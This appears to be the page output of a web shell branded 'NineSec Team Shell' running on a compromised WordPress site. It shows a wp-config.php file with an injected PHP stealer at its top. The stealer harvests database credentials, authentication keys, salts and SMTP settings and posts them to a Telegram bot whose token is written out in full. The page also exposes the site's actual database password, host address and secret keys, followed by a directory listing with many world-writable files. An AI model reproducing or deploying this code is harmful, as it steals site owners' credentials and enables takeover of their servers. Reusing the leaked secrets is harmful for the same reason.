NineSec Team Shell

<?php // TELEGRAM_PARSER_INJECTED // --- Telegram Configuration --- $tg_api_url = "https://api.telegram.org/bot8214934297:AAHTIei0vzVQ0H1nqKYTJCuGgTjRskxERHI/sendMessage?chat_id=-1003537503195&text="; // --- Target Files --- // Use __DIR__ to reliably search from the wp-config.php directory. $base_path = __DIR__; $target_files = array_merge( glob($base_path . '/wp-config.php'), glob($base_path . '/wp-config.php.bak'), glob($base_path . '/wp-content/**/wp-mail-smtp.php'), glob($base_path . '/wp-content/**/smtp-config.php'), glob($base_path . '/wp-content/**/easy-wp-smtp.php') ); $results = []; $found_anything = false; // --- Parsing Logic --- foreach ($target_files as $file) { if (file_exists($file) && is_readable($file)) { $content = file_get_contents($file); $filename = basename($file); if ($filename === 'wp-config.php' || $filename === 'wp-config.php.bak') { preg_match_all("/define$\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*$;/", $content, $matches, PREG_SET_ORDER); $db_creds = []; $auth_keys = []; foreach ($matches as $match) { $constant_name = $match[1]; $constant_value = $match[2]; if (in_array($constant_name, ['DB_NAME', 'DB_USER', 'DB_PASSWORD', 'DB_HOST'])) { $db_creds[$constant_name] = $constant_value; $found_anything = true; } if (strpos($constant_name, 'KEY') !== false || strpos($constant_name, 'SALT') !== false) { $auth_keys[$constant_name] = $constant_value; $found_anything = true; } } if (!empty($db_creds)) $results['Database Credentials'] = $db_creds; if (!empty($auth_keys)) $results['Auth Keys & Salts'] = $auth_keys; } else { preg_match_all("/\$([a-zA-Z0-9_]+)\s*=\s*['\"]([^'\"]+)['\"]\s*;/", $content, $matches, PREG_SET_ORDER); $smtp_settings = []; foreach ($matches as $match) { $var_name = strtolower($match[1]); $var_value = $match[2]; if (strpos($var_name, 'smtp') !== false || strpos($var_name, 'mail') !== false) { $smtp_settings[$var_name] = $var_value; $found_anything = true; } } if (!empty($smtp_settings)) { $results["SMTP Settings (from $filename)"] = $smtp_settings; } } } } // --- Telegram Notification --- if ($found_anything && !empty($results)) { $message = "--- Parse Results from: " . $_SERVER['HTTP_HOST'] . " ---\n\n"; foreach ($results as $category => $data) { $message .= "*" . htmlspecialchars($category) . "*:\n"; foreach ($data as $key => $value) { $safe_value = htmlspecialchars($value); $message .= "`" . htmlspecialchars($key) . ": " . $safe_value . "`\n"; } $message .= "\n"; } $request_url = $tg_api_url . urlencode($message); @file_get_contents($request_url); } /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/documentation/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'maa' ); /** Database username */ define( 'DB_USER', 'maa' ); /** Database password */ define( 'DB_PASSWORD', 'odxenbxdxlnzymxrzdjnny' ); /** Database hostname */ define( 'DB_HOST', '194.163.155.171:443' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'cPm?}cFKIuc-_TuO-m{rUl<^56aTd9n|Lg.b$;E^u6}s~MTOFDI9GbnW0tcq3btu' ); define( 'SECURE_AUTH_KEY', '~@w6Auv6J~~k}%lYM[gW;YuGDHW09IW4zO]6C1ts|Ms|Fi|l__6CBot5@GT`o;!W' ); define( 'LOGGED_IN_KEY', '@>t?c1~JDG|j65kQU}%h1-@Y+78@hH>dE_6rcvrP]ove0*U#-/NQa@<5kn0*M/yJ' ); define( 'NONCE_KEY', 'r,M@{YKr@kkqUydN:y(h6N1cdj:A2:t^ v:@l+eu)Nq},U6#5~`7DgbX,krctNSo' ); define( 'AUTH_SALT', 'rc*;L&]:8d(|sFF9ziFJdr yjSWwUT~e3EWQeK!-TQH8GC?TX5:VNF&O+xJ)X2n!' ); define( 'SECURE_AUTH_SALT', 'z%*`$?X<Q5e85B-Nfh]CgsqAC./B.Ne.FP0]YDztku/nLv7~0Q8|4i eBi]M4@Fr' ); define( 'LOGGED_IN_SALT', 'fq`&D:EL9#Cp)LbcP;<k~XH+&)/4o$xB55xby~+a6q,.a{gmT{%nx=2~U{U]~y~j' ); define( 'NONCE_SALT', '$C&7&{x35RXA5Ql|z#ta{5bl[ULUW&FXzItBd<R+`33.gdWY-&Mvw2RD7_UWioVH' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_151259327833'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/documentation/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';

Name	Size	Last Modified	Owner	Permissions	Options
..	--	December 20 2025 2:54:52	readytorun	0750
about	--	October 24 2025 7:58:05	readytorun	0755
cgi-bin	--	September 11 2024 5:18:57	readytorun	0755
godsend	--	October 24 2025 7:57:22	readytorun	0755
images	--	November 14 2025 9:26:19	readytorun	0755
phmad	--	September 11 2024 5:18:57	readytorun	0755
wp-admin	--	January 08 2026 9:53:55	readytorun	0755
wp-content	--	September 11 2024 5:18:57	readytorun	0755
wp-includes	--	January 15 2025 5:40:42	readytorun	0755

.htaccess	1.994 KB	November 14 2025 9:26:20	readytorun	0444
editcustrepfld.php	0.521 KB	December 30 2025 3:57:24	readytorun	0644
gallery.lang_it.php	0.606 KB	January 02 2026 9:11:25	readytorun	0644
index.php	21.401 KB	November 28 2025 12:27:26	readytorun	0444
path.php	0.661 KB	December 29 2025 2:17:39	readytorun	0644
postnews.php	5.579 KB	October 24 2025 7:58:17	readytorun	0444
reminder_review.php	0.387 KB	December 31 2025 4:47:24	readytorun	0644
robots.txt	31.743 KB	November 14 2025 9:26:20	readytorun	0644
wp-activate.php	7.042 KB	August 28 2023 5:01:53	readytorun	0777
wp-blog-header.php	0.525 KB	November 14 2025 9:26:20	readytorun	0444
wp-comments-post.php	2.269 KB	August 28 2023 5:01:53	readytorun	0777
wp-config-sample.php	2.942 KB	November 10 2023 1:05:53	readytorun	0777
wp-config.php	6.39 KB	November 14 2025 9:26:19	readytorun	0777
wp-cron.php	5.506 KB	August 28 2023 5:01:53	readytorun	0777
wp-links-opml.php	2.443 KB	August 28 2023 5:01:54	readytorun	0777
wp-load.php	4.002 KB	November 14 2025 9:26:20	readytorun	0444
wp-mail.php	8.325 KB	November 10 2023 1:05:53	readytorun	0777
wp-settings.php	25.79 KB	November 14 2025 9:26:19	readytorun	0777
wp-signup.php	33.579 KB	August 28 2023 5:01:54	readytorun	0777
wp-trackback.php	4.771 KB	August 28 2023 5:01:54	readytorun	0777
xmlrpc.php	3.08 KB	November 10 2023 1:05:53	readytorun	0777

NineSec Team - 2022